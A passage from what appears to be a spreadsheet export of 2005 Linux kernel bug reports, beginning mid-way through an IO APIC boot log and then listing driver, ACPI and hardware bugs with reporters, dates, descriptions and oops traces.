0 0 0 0 1 1 31 Mar 7 14:29:56 oxygen 03 00F 0F 0 0 0 0 0 1 1 41 Mar 7 14:29:56 oxygen 04 00F 0F 0 0 0 0 0 1 1 49 Mar 7 14:29:56 oxygen 05 00F 0F 0 0 0 0 0 1 1 51 Mar 7 14:29:56 oxygen 06 00F 0F 0 0 0 0 0 1 1 59 Mar 7 14:29:56 oxygen 07 00F 0F 0 0 0 0 0 1 1 61 Mar 7 14:29:56 oxygen 08 00F 0F 0 0 0 0 0 1 1 69 Mar 7 14:29:56 oxygen 09 00F 0F 0 1 0 0 0 1 1 71 Mar 7 14:29:56 oxygen 0a 00F 0F 0 0 0 0 0 1 1 79 Mar 7 14:29:56 oxygen 0b 00F 0F 0 0 0 0 0 1 1 81 Mar 7 14:29:56 oxygen 0c 00F 0F 0 0 0 0 0 1 1 89 Mar 7 14:29:56 oxygen 0d 00F 0F 0 0 0 0 0 1 1 91 Mar 7 14:29:56 oxygen 0e 00F 0F 0 0 0 0 0 1 1 99 Mar 7 14:29:56 oxygen 0f 00F 0F 0 0 0 0 0 1 1 A1 Mar 7 14:29:56 oxygen 10 00F 0F 1 1 0 1 0 1 1 A9 Mar 7 14:29:56 oxygen 11 00F 0F 1 1 0 1 0 1 1 B9 Mar 7 14:29:56 oxygen 12 00F 0F 1 1 0 1 0 1 1 C1 Mar 7 14:29:56 oxygen 13 00F 0F 1 1 0 1 0 1 1 B1 Mar 7 14:29:56 oxygen 14 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 15 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 16 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 17 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen Mar 7 14:29:56 oxygen IO APIC #9...... Mar 7 14:29:56 oxygen .... register #00: 09000000 Mar 7 14:29:56 oxygen ....... : physical APIC id: 09 Mar 7 14:29:56 oxygen ....... : Delivery Type: 0 Mar 7 14:29:56 oxygen ....... : LTS : 0 Mar 7 14:29:56 oxygen .... register #01: 00178020 Mar 7 14:29:56 oxygen ....... : max redirection entries: 0017 Mar 7 14:29:56 oxygen ....... : PRQ implemented: 1 Mar 7 14:29:56 oxygen ....... : IO APIC version: 0020 Mar 7 14:29:56 oxygen .... register #02: 09000000 Mar 7 14:29:56 oxygen ....... : arbitration: 09 Mar 7 14:29:56 oxygen .... register #03: 00000001 Mar 7 14:29:56 oxygen ....... : Boot DT : 1 Mar 7 14:29:56 oxygen .... IRQ redirection table: Mar 7 14:29:56 oxygen NR Log Phy Mask Trig IRR Pol Stat Dest Deli Vect: Mar 7 14:29:56 oxygen 00 00F 0F 1 1 0 1 0 1 1 C9 Mar 7 14:29:56 oxygen 01 00F 0F 1 1 0 1 0 1 1 D9 Mar 7 14:29:56 oxygen 02 00F 0F 1 1 0 1 0 1 1 E1 Mar 7 14:29:56 oxygen 03 00F 0F 1 1 0 1 0 1 1 D1 Mar 7 14:29:56 oxygen 04 00F 0F 1 1 0 1 0 1 1 E9 Mar 7 14:29:56 oxygen 05 00F 0F 1 1 0 1 0 1 1 32 Mar 7 14:29:56 oxygen 06 00F 0F 1 1 0 1 0 1 1 3A Mar 7 14:29:56 oxygen 07 00F 0F 1 1 0 1 0 1 1 42 Mar 7 14:29:56 oxygen 08 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 09 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0a 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0b 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0c 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0d 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0e 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0f 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 10 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 11 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 12 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 13 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 14 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 15 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 16 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 17 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen Mar 7 14:29:56 oxygen IO APIC #10...... Mar 7 14:29:56 oxygen .... register #00: 0A000000 Mar 7 14:29:56 oxygen ....... : physical APIC id: 0A Mar 7 14:29:56 oxygen ....... : Delivery Type: 0 Mar 7 14:29:56 oxygen ....... : LTS : 0 Mar 7 14:29:56 oxygen .... register #01: 00178020 Mar 7 14:29:56 oxygen ....... : max redirection entries: 0017 Mar 7 14:29:56 oxygen ....... : PRQ implemented: 1 Mar 7 14:29:56 oxygen ....... : IO APIC version: 0020 Mar 7 14:29:56 oxygen .... register #02: 0A000000 Mar 7 14:29:56 oxygen ....... : arbitration: 0A Mar 7 14:29:56 oxygen .... register #03: 00000001 Mar 7 14:29:56 oxygen ....... : Boot DT : 1 Mar 7 14:29:56 oxygen .... IRQ redirection table: Mar 7 14:29:56 oxygen NR Log Phy Mask Trig IRR Pol Stat Dest Deli Vect: Mar 7 14:29:56 oxygen 00 00F 0F 1 1 0 1 0 1 1 4A Mar 7 14:29:56 oxygen 01 00F 0F 1 1 0 1 0 1 1 5A Mar 7 14:29:56 oxygen 02 00F 0F 1 1 0 1 0 1 1 62 Mar 7 14:29:56 oxygen 03 00F 0F 1 1 0 1 0 1 1 52 Mar 7 14:29:56 oxygen 04 00F 0F 1 1 0 1 0 1 1 6A Mar 7 14:29:56 oxygen 05 00F 0F 1 1 0 1 0 1 1 72 Mar 7 14:29:56 oxygen 06 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 07 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 08 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 09 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0a 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0b 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0c 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0d 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0e 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 0f 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 10 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 11 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 12 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 13 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 14 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 15 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 16 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 17 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen IRQ to pin mappings: Mar 7 14:29:56 oxygen IRQ0 -&gt; 0:2 Mar 7 14:29:56 oxygen IRQ1 -&gt; 0:1 Mar 7 14:29:56 oxygen IRQ3 -&gt; 0:3 Mar 7 14:29:56 oxygen IRQ4 -&gt; 0:4 Mar 7 14:29:56 oxygen IRQ5 -&gt; 0:5 Mar 7 14:29:56 oxygen IRQ6 -&gt; 0:6 Mar 7 14:29:56 oxygen IRQ7 -&gt; 0:7 Mar 7 14:29:56 oxygen IRQ8 -&gt; 0:8 Mar 7 14:29:56 oxygen IRQ9 -&gt; 0:9 Mar 7 14:29:56 oxygen IRQ10 -&gt; 0:10 Mar 7 14:29:56 oxygen IRQ11 -&gt; 0:11 Mar 7 14:29:56 oxygen IRQ12 -&gt; 0:12 Mar 7 14:29:56 oxygen IRQ13 -&gt; 0:13 Mar 7 14:29:56 oxygen IRQ14 -&gt; 0:14 Mar 7 14:29:56 oxygen IRQ15 -&gt; 0:15 Mar 7 14:29:56 oxygen IRQ16 -&gt; 0:16 Mar 7 14:29:56 oxygen IRQ17 -&gt; 0:17 Mar 7 14:29:56 oxygen IRQ18 -&gt; 0:18 Mar 7 14:29:56 oxygen IRQ19 -&gt; 0:19 Mar 7 14:29:56 oxygen IRQ24 -&gt; 1:0 Mar 7 14:29:56 oxygen IRQ25 -&gt; 1:1 Mar 7 14:29:56 oxygen IRQ26 -&gt; 1:2 Mar 7 14:29:56 oxygen IRQ27 -&gt; 1:3 Mar 7 14:29:56 oxygen IRQ28 -&gt; 1:4 Mar 7 14:29:56 oxygen IRQ29 -&gt; 1:5 Mar 7 14:29:56 oxygen IRQ30 -&gt; 1:6 Mar 7 14:29:56 oxygen IRQ31 -&gt; 1:7 Mar 7 14:29:56 oxygen IRQ48 -&gt; 2:0 Mar 7 14:29:56 oxygen IRQ49 -&gt; 2:1 Mar 7 14:29:56 oxygen IRQ50 -&gt; 2:2 Mar 7 14:29:56 oxygen IRQ51 -&gt; 2:3 Mar 7 14:29:56 oxygen IRQ52 -&gt; 2:4 Mar 7 14:29:56 oxygen IRQ53 -&gt; 2:5 Mar 7 14:29:56 oxygen .................................... done. Mar 7 14:29:56 oxygen PCI: Using ACPI for IRQ routing Mar 7 14:29:56 oxygen Linux NET4.0 for Linux 2.4 Mar 7 14:29:56 oxygen Based upon Swansea University Computer Society NET3.039 Mar 7 14:29:56 oxygen Initializing RT netlink socket Mar 7 14:29:56 oxygen IA-32 Microcode Update Driver: v1.14 &lt;tigran@veritas.com&gt; Mar 7 14:29:56 oxygen BIOS EDD facility v0.11 2004-Jun-21, 2 devices found Mar 7 14:29:56 oxygen Starting kswapd Mar 7 14:29:56 oxygen allocated 32 pages and 32 bhs reserved for the highmem bounces Mar 7 14:29:56 oxygen devfs: v1.12c (20020818) Richard Gooch (rgooch@atnf.csiro.au) Mar 7 14:29:56 oxygen devfs: boot_options: 0x1 Mar 7 14:29:56 oxygen SGI XFS with no debug enabled Mar 7 14:29:56 oxygen ACPI: Power Button (FF) [PWRF] Mar 7 14:29:56 oxygen ACPI: Processor [CPU1] (supports C1) Mar 7 14:29:56 oxygen ACPI: Processor [CPU2] (supports C1) Mar 7 14:29:56 oxygen ACPI: Processor [CPU3] (supports C1) Mar 7 14:29:56 oxygen ACPI: Processor [CPU4] (supports C1) Steps to reproduce:</t>
  </si>
  <si>
    <t>tridentfb: flicker when disk I/O is happening</t>
  </si>
  <si>
    <t>2005-03-08 10:49 UTC</t>
  </si>
  <si>
    <t>2005-08-31 01:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/sarge Hardware Environment: VIA Mini-ITX with onboard graphic lspci -v: 0000:01:00.0 VGA compatible controller: Trident Microsystems CyberBlade/i1 (rev 6a) (prog-if 00 [VGA]) Subsystem: Trident Microsystems CyberBlade/i1 Flags: bus master, 66MHz, medium devsel, latency 32, IRQ 11 Memory at e1800000 (32-bit, non-prefetchable) [size=8M] Memory at e2000000 (32-bit, non-prefetchable) [size=128K] Memory at e1000000 (32-bit, non-prefetchable) [size=8M] Capabilities: [80] AGP version 2.0 Status: RQ=33 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; Capabilities: [90] Power Management version 1 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Problem Description: When there is disk I/O happening, the framebuffer has a little snow on the screen. Once I/O has finished, no garbage remains on screen. Steps to reproduce: boot with video=tridentfb (tried with and without noaccel). module via_agp is loaded with no special options, kernel command line contains agp_try_unsupported=1</t>
  </si>
  <si>
    <t>S4 reboots machine when AC is connected</t>
  </si>
  <si>
    <t>2005-03-09 10:23 UTC</t>
  </si>
  <si>
    <t>2006-02-02 14:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 3 Hardware Environment: HP/Compaq nx7010 Problem Description: When S4 is entered and ac is connected then the machine reboots instead of powering down. Behaviour is identical to that of bug 3909 and bug 3669. So an obvious first patch is the same fix for S4 (if that's possible). I haven't been playing around with S4 previously so I do not know if this is a new bug or something that's always been there.</t>
  </si>
  <si>
    <t>HPFS support is broken on amd64 platform</t>
  </si>
  <si>
    <t>2.6.11.3</t>
  </si>
  <si>
    <t>2005-03-12 18:04 UTC</t>
  </si>
  <si>
    <t>2005-10-03 07:07 UTC</t>
  </si>
  <si>
    <t>Mounting HPFS volume under debian-amd64 fails with the following error HPFS: filesystem error: dir band size mismatch: dir_band_start==009ffff4, dir_band_end==65534644, n_dir_band==00a03e83 The very same HPFS volume is mounted fine under debian-i386.</t>
  </si>
  <si>
    <t>kernel support for netmos 9835/9735 crippled since 2.6.9</t>
  </si>
  <si>
    <t>2.6.9 2.6.10 2.6.11 2.6.11.2</t>
  </si>
  <si>
    <t>2005-03-13 01:11 UTC</t>
  </si>
  <si>
    <t>Steven Brudenell</t>
  </si>
  <si>
    <t>2005-08-25 16:59 UTC</t>
  </si>
  <si>
    <t>Distribution: Any Hardware Environment: NetMos 9835 or 9735 Software Environment: Any Problem Description: In kernel 2.6.9, a patch was added to parport_pc to support the parallel port on netmos 9835 and 9735 chipsets, which are found on combo parallel/serial pci cards. Support for these chips already existed in parport_serial prior to this. Since parport_serial depends on parport_pc, parport_pc always gets loaded first, with limited (parallel port only) support for these cards, and the complete (parallel+serial) functionality in parport_serial is superseded. The serial functionality of these cards does not work in either 2.6.9 or 2.6.10. Reproducible: Always Steps to Reproduce: 1. Obtain NetMos 9835 or 9735 board. 2. Compile linux 2.6.9 or 2.6.10 with support for parport_serial enabled (built-in or module, either way works). 3. Boot with this kernel. Actual Results: Only the parallel port on this board is identified. Expected Results: Both the parallel port and the serial ports (there are two on the 9835, which I have) should be identified. I have read of other people having an identical problem, with the same boards on the same kernel version. Removing support in parport_pc for these netmos boards produces the required functionality. Using 2.6.8.1 with the same configuration also works.</t>
  </si>
  <si>
    <t>it87.c: bad detection of it8712f-a  chip</t>
  </si>
  <si>
    <t>2005-03-14 09:17 UTC</t>
  </si>
  <si>
    <t>Przemyslaw Bialek</t>
  </si>
  <si>
    <t>2005-08-08 12:13 UTC</t>
  </si>
  <si>
    <t>Distribution: PLD Hardware Environment: nforce4 (ga-k8nxp-sli), Athlon64 3000+ Software Environment: gcc 3.4.3, binutils 2.15.94.0.2.2, module-init-tools 3.0 Problem Description: in file it87.c in function it87_detect in line 743 (inb_p(address + 7) != i)) on my hardware the result in diffrent than in other registers, and detection fails. When i comment this line, chip is detected properly, and I have working sensors.</t>
  </si>
  <si>
    <t>ATI Rage 128: messed up X</t>
  </si>
  <si>
    <t>2.6.11-bk3 to (at least) 2.6.12-rc1</t>
  </si>
  <si>
    <t>2005-03-14 10:07 UTC</t>
  </si>
  <si>
    <t>Markus</t>
  </si>
  <si>
    <t>2005-03-31 04:54 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge (testing) Hardware Environment: i686 (P3) Software Environment: i686 GNU/Linux Problem Description: When X should start, the screen is randomly colored with some kind of grid in bottom 2/3 (top 1/3 black). The cursor is visible and can be moved. Sometimes some parts of eg kdm are painted (eg one button or one edit filed). Its hard to change to console. After that some lines like the following appear in the XFree log: (EE) R128(0): R128CCEWaitForIdle: (DEBUG) CCE idle took i = 1025 (EE) R128(0): Idle timed out, resetting engine... And some logs of message: kernel: Linux agpgart interface v0.101 (c) Dave Jones &lt; the version was 0.100 before kernel: agpgart: Detected VIA Apollo Pro 133 chipset ***kernel: agpgart: Maximum main memory to use for agp memory: 203M***&lt; does not appear (but normally does 2.6.11) kernel: agpgart: AGP aperture is 64M @ 0xe0000000 kernel: [drm] Initialized drm 1.0.0 20040925 kernel: [drm] Initialized r128 2.5.0 20030725 on minor 0: ATI Technologies Inc Rage 128 RF/SG AGP kernel: agpgart: Found an AGP 1.0 compliant device at 0000:00:00.0. kernel: agpgart: Putting AGP V2 device at 0000:00:00.0 into 1x mode kernel: agpgart: Putting AGP V2 device at 0000:01:00.0 into 1x mode I know that the bk are for testing, but this problem now exists for at least 3 of them... If any further information is needed, please tell it... Steps to reproduce: Dont exactly know. I use a ATI Rage 128 with its modules compiled in kernel and a via agp-chip...</t>
  </si>
  <si>
    <t>EC address handler is wrong</t>
  </si>
  <si>
    <t>2005-03-15 22:09 UTC</t>
  </si>
  <si>
    <t>2005-07-27 18:44 UTC</t>
  </si>
  <si>
    <t>Current EC address handler is wrong. It 1. changed *value when write 2. wrong address offset for read/write with bit width &gt; 8</t>
  </si>
  <si>
    <t>savavgefb ddc eeprom oops when "sensors" used as non-root</t>
  </si>
  <si>
    <t>2005-03-15 23:31 UTC</t>
  </si>
  <si>
    <t>Salah Coronya</t>
  </si>
  <si>
    <t>2005-05-26 00:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo (Linux ardvarc 2.6.11-gentoo-r2 #4 Wed Mar 9 15:50:59 CST 2005 i686 AMD Athlon(tm) XP 2000+ AuthenticAMD GNU/Linux) Hardware Environment: Put-together machine 512M Output of lspci: 0000:00:00.0 Host bridge: VIA Technologies, Inc. VT8375 [KM266/KL266] Host Bridge 0000:00:01.0 PCI bridge: VIA Technologies, Inc. VT8633 [Apollo Pro266 AGP] 0000:00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 0000:00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 0000:00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 0000:00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) 0000:00:11.0 ISA bridge: VIA Technologies, Inc. VT8235 ISA Bridge 0000:00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) 0000:00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 50) 0000:00:13.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 0000:01:00.0 VGA compatible controller: S3 Inc. VT8375 [ProSavage8 KM266/KL266] Software Environment: For this one, a stripped down 2.6.11.3 kernel (but its occured since at least when savagefb was introduced) Problem Description: when "savagefb-i2c" is loaded, framebuffer console enabled and eeprom module loaded or compiled in, if a non-root user runs the "sensors" command, the kernel panics or reboots instantly Steps to reproduce: 1) Compile kernel with "S3 Savage support", "Enable ddc2 support" and "Framebuffer Console Support" compiled in. 2) Either compile in or load eeprom and i2c algorithm modules 3) Boot kernel with Command line: video=savagefb:1024x768-16@60 4) Run "sensors" command with eeprom in kernel (Either built-in or modprobed") as a non-root user</t>
  </si>
  <si>
    <t>snd_emu10k1 oops'es with Audigy 2 and various kernels &gt;2.6.11</t>
  </si>
  <si>
    <t>2.6.11-bk8 and 2.6.11-mm[23]</t>
  </si>
  <si>
    <t>2005-03-16 12:40 UTC</t>
  </si>
  <si>
    <t>John ( Jak ) Kinsella</t>
  </si>
  <si>
    <t>2005-04-06 00:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrakelinux Hardware Environment: i386 PC with Creative Audigy 2 soundcard installed Software Environment: Mandrakelinux 10.1 initscripts loading alsa Problem Description: Kernel Oops on loading snd_emu10k1 with kernel versions &gt; 2.6.11 Steps to reproduce: Boot PC, initscripts try to load alsa driver, PC hangs ( 100% reproducible ) Details below: I am having problems with alsa snd_emu10k1 driver for my Creative Audigy 2 ZS Platinum Pro sound card with recent kernels. The module Oops'es every time. This has the effect of killing my machine as my initscripts try to load sound long before networking or getty so I never get a login. Summary of kernels I have tested: 2.6.11 vanilla</t>
  </si>
  <si>
    <t>acpi_get_firmware_table return an invalid block of memory</t>
  </si>
  <si>
    <t>2.6.9-5.EL-ia64</t>
  </si>
  <si>
    <t>2005-03-16 19:35 UTC</t>
  </si>
  <si>
    <t>aaron</t>
  </si>
  <si>
    <t>2005-04-14 23:57 UTC</t>
  </si>
  <si>
    <t>I find this bug in IPMI driver but after root cause I think it is an ACPI related bug.So post it here and say sorry in advance if it is not the proper place for it. Distribution: Red Hat Enterprise Linux AS release 4 Hardware Environment: HPCX 2600 Software Environment: Problem Description: Fail to load ipmi_si driver with oop. More details can be found in PS2. After debugging with the driver, I found the OOP is caused by an invalid address.In IPMI driver, we will call acpi_get_firmware_table in try_init_acpi function to get the information of SPMI table. In this information, there is a memory pointered by spmi-&gt;addr.address and it is invalid. It seems acpi map a wrong memory and send itout to IPMI but from the boot log of system ACPI is enabled properly. I think in this case, an error code should be returned by acpi_get_firmware_table instead of AE_OK, just as what we see in IPMI driver (See PS1) Steps to reproduce: modprobe ipmi_msghandler modprobe ipmi_si kcs_addrs=0xff5b0ca2 PS1: Unable to handle kernel paging request at virtual address 00000000ff5b0caa insmod[3942]: Oops 8813272891392 [1] Modules linked in: ipmi_si(U) ipmi_msghandler(U) md5 ipv6 parport_pc lp parport autofs4 sunrpc ds yenta_socket pcmcia_core vfat fat dm_mod button joydev ohci_hcd ehci_hcd e100 mii tg3 ext3 jbd mptscsih mptbase sd_mod scsi_mod Pid: 3942, CPU 1, comm: insmod psr : 0000101008126030 ifs : 8000000000000693 ip : [&lt;a00000020048a110&gt;] Not tainted ip is at init_one_smi+0x19b0/0x2760 [ipmi_si] unat: 0000000000000000 pfs : 0000000000000693 rsc : 0000000000000003 rnat: 0000000000000060 bsps: 0000000000000040 pr : 0000000005559a59 ldrs: 0000000000000000 ccv : 0000000000000000 fpsr: 0009804c8a70033f csd : 0000000000000000 ssd : 0000000000000000 b0 : a00000020048a0b0 b6 : a00000010022cba0 b7 : a000000100237780 f6 : 000000000000000000000 f7 : 0ffe1f000000000000000 f8 : 10005f000000000000000 f9 : 100028000000000000000 f10 : 10002effffffff1000000 f11 : 1003e000000000000000f r1 : a000000200684000 r2 : e00000000487c384 r3 : e00000003fb20688 r8 : 0000000000000000 r9 : a0007ffffff28ad8 r10 : a0007ffffff28ab0 r11 : 0000000000055156 r12 : e000000032da7e00 r13 : e000000032da0000 r14 : e00000000487c5c0 r15 : 0000000000000078 r16 : 0000000000000230 r17 : 0000000000000047 r18 : e00000000487c390 r19 : a0007fffffc80000 r20 : 00000000000613d0 r21 : 000000000000c27a r22 : e000000032da0dd4 r23 : 00000000ff5b0caa r24 : 00000000ff5b0ca2 r25 : 0000000000000000 r26 : 00000000ff5b0ca2 r27 : 0000000000000000 r28 : e00000003fb344a4 r29 : e00000003fb344a8 r30 : e00000003fb34470 r31 : a000000200491cf0 Call Trace: [&lt;a000000100016a40&gt;] show_stack+0x80/0xa0 sp=e000000032da79b0 bsp=e000000032da1098 [&lt;a000000100017350&gt;] show_regs+0x890/0x8c0 sp=e000000032da7b80 bsp=e000000032da1050 [&lt;a00000010003c970&gt;] die+0x150/0x240 sp=e000000032da7ba0 bsp=e000000032da1010 [&lt;a00000010005d870&gt;] ia64_do_page_fault+0x9f0/0xba0 sp=e000000032da7ba0 bsp=e000000032da0fa0 [&lt;a00000010000f480&gt;] ia64_leave_kernel+0x0/0x260 sp=e000000032da7c30 bsp=e000000032da0fa0 [&lt;a00000020048a110&gt;] init_one_smi+0x19b0/0x2760 [ipmi_si] sp=e000000032da7e00 bsp=e000000032da0f08 [&lt;a000000200338290&gt;] init_ipmi_si+0x230/0x560 [ipmi_si] sp=e000000032da7e30 bsp=e000000032da0ed0 [&lt;a0000001000af320&gt;] sys_init_module+0x420/0x620 sp=e000000032da7e30 bsp=e000000032da0e60 [&lt;a00000010000f320&gt;] ia64_ret_from_syscall+0x0/0x20 sp=e000000032da7e30 bsp=e000000032da0e60 [&lt;a000000000010640&gt;] 0xa000000000010640 sp=e000000032da8000 bsp=e000000032da0e60 PS2:(from dmesg) Linux version 2.6.9-5.EL (bhcompile@bullwinkle.build.redhat.com) (gcc version 3.4.3 20041212 (Red Hat 3.4.3-9.EL4)) #1 SMP Wed Jan 5 19:23:24 EST 2005 EFI v1.10 by HP: SALsystab=0x3fb38000 ACPI 2.0=0x3fb2c000 SMBIOS=0x3fb3a000 HCDP=0x3fb2a000 booting generic kernel on platform hpzx1 ACPI: RSDP (v002 HP ) @ 0x000000003fb2c000 ACPI: XSDT (v001 HP cx2600 0x00000000 HP 0x00000000) @ 0x000000003fb2c02c ACPI: FADT (v003 HP cx2600 0x00000000 HP 0x00000000) @ 0x000000003fb342b0 ACPI: SPCR (v001 HP cx2600 0x00000000 HP 0x00000000) @ 0x000000003fb343e8 ACPI: DBGP (v001 HP cx2600 0x00000000 HP 0x00000000) @ 0x000000003fb34438 ACPI: MADT (v001 HP cx2600 0x00000000 HP 0x00000000) @ 0x000000003fb34510 ACPI: SPMI (v004 HP cx2600 0x00000000 HP 0x00000000) @ 0x000000003fb34470 ACPI: CPEP (v001 HP cx2600 0x00000000 HP 0x00000000) @ 0x000000003fb344c0 ACPI: SSDT (v001 HP cx2600 0x00000006 INTL 0x02012044) @ 0x000000003fb31940 ACPI: SSDT (v001 HP cx2600 0x00000006 INTL 0x02012044) @ 0x000000003fb31ad0 ACPI: SSDT (v001 HP cx2600 0x00000006 INTL 0x02012044) @ 0x000000003fb31dd0 ACPI: SSDT (v001 HP cx2600 0x00000006 INTL 0x02012044) @ 0x000000003fb32640 ACPI: SSDT (v001 HP cx2600 0x00000006 INTL 0x02012044) @ 0x000000003fb32eb0 ACPI: SSDT (v001 HP cx2600 0x00000006 INTL 0x02012044) @ 0x000000003fb33720 ACPI: SSDT (v001 HP cx2600 0x00000006 INTL 0x02012044) @ 0x000000003fb33f90 ACPI: SSDT (v001 HP cx2600 0x00000006 INTL 0x02012044) @ 0x000000003fb34120 ACPI: SSDT (v001 HP cx2600 0x00000006 INTL 0x02012044) @ 0x000000003fb341e0 ACPI: DSDT (v001 HP cx2600 0x00000007 INTL 0x02012044) @ 0x0000000000000000 Warning: acpi_table_parse(ACPI_SRAT) returned 0! Warning: acpi_table_parse(ACPI_SLIT) returned 0! Thanx.</t>
  </si>
  <si>
    <t>No sound with outbound calls from asterisk over CAPI</t>
  </si>
  <si>
    <t>2005-03-17 06:54 UTC</t>
  </si>
  <si>
    <t>Sven Killig</t>
  </si>
  <si>
    <t>2005-05-14 07:00 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: Eicon Networks Corporation Diva Server BRI 2M Revision 2 (rev 01) AVM Audiovisuelles MKTG &amp; Computer System GmbH B1 ISDN [PCI] System information of one of the two servers: http://sonic.dnsalias.net/stat/programm/stat.prg Software Environment: asterisk 1.0.6 chan_capi-0.3.5 Problem Description: There is neither incoming nor outgoing sound in the handsets when placing calls with asterisk over CAPI. Inbound calls have correct sound. I confirmed this with two quite different servers. It works flawlessly with 2.6.10.</t>
  </si>
  <si>
    <t>With HT off in bios, /proc/cpuinfo shows2 processors, each with 2 siblings</t>
  </si>
  <si>
    <t>2.6.6 - 2.6.11</t>
  </si>
  <si>
    <t>2005-03-17 12:25 UTC</t>
  </si>
  <si>
    <t>Jay Hilliard</t>
  </si>
  <si>
    <t>2005-06-03 17:05 UTC</t>
  </si>
  <si>
    <t>Distribution: RHEL4 AS, Fedora Core 2 Hardware Environment: Dual Xeon (HP DL-360 or Sun Fire V60x) Software Environment: kernel-smp Problem Description: inconsistent sibling count when ht is disabled Steps to reproduce: On an HP DL-360 or Sun Fire V60x (dual xeon systems) 1. disable HT in the bios 2. boot any smp kernel after 2.6.5 (didn't try UP kernel) 3. /proc/cpuinfo shows 2 processors (phys ID 0 and 3) with 2 siblings Expected behavior: /proc/cpuinfo should show 2 processors with 1 sibling each. I don't see this behavior on any of my other dual xeon systems (HP x4000, xw8000, or xw8200). I don't see this behavior on ANY systems running kernel 2.6.5 or earlier. I've tried updating the firmware and that didn't help.</t>
  </si>
  <si>
    <t>AT keyboard : right "windows" key doesn't work any more</t>
  </si>
  <si>
    <t>2.6.11-rc5-mm1 and newer</t>
  </si>
  <si>
    <t>2005-03-17 17:06 UTC</t>
  </si>
  <si>
    <t>2005-03-19 00:09 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 10.2 beta 3 Hardware Environment: desktop box with standard french 105-key keyboard Software Environment: Problem Description: Since 2.6.11-rc5-mm1, hitting the right "windows" key has no effect. The left "windows" key works perfectly. Before 2.6.11-rc5-mm1 or with vanilla kernel, the right "windows" key works. The showkey utility reports keycode 126 for this key. This problem is due to changeset 1.1982.105.1 http://dtor.bkbits.net:8080/input/cset@1.1982.105.1?nav=index.html|src/|src/drivers|src/drivers/input|src/drivers/input/keyboard|related/drivers/input/keyboard/atkbd.c Workaround : ------------ Boot with "atkbd.scroll=0" parameter or echo -n 0 &gt; /sys/bus/serio/drivers/atkbd/serio1/scroll</t>
  </si>
  <si>
    <t>(sata) panic spin_lock already locked</t>
  </si>
  <si>
    <t>2.6.10-1.770_FC3</t>
  </si>
  <si>
    <t>2005-03-17 21:56 UTC</t>
  </si>
  <si>
    <t>Ralph Campbell</t>
  </si>
  <si>
    <t>2005-12-03 21:09 UTC</t>
  </si>
  <si>
